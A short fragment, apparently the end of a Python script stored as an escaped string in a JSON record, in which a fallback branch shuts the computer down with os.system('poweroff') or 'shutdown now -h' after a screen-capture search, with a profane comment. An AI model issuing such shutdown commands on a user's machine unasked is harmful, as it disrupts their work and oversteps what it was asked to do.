os.system(\"poweroff\")\r\n else:\r\n #fucking try unix based shit again\r\n os.system(\"shutdown now -h\")\r\n\r\n#main\r\ndef main():\r\n screenSearch(input, screenGrab())\r\n" } ]
1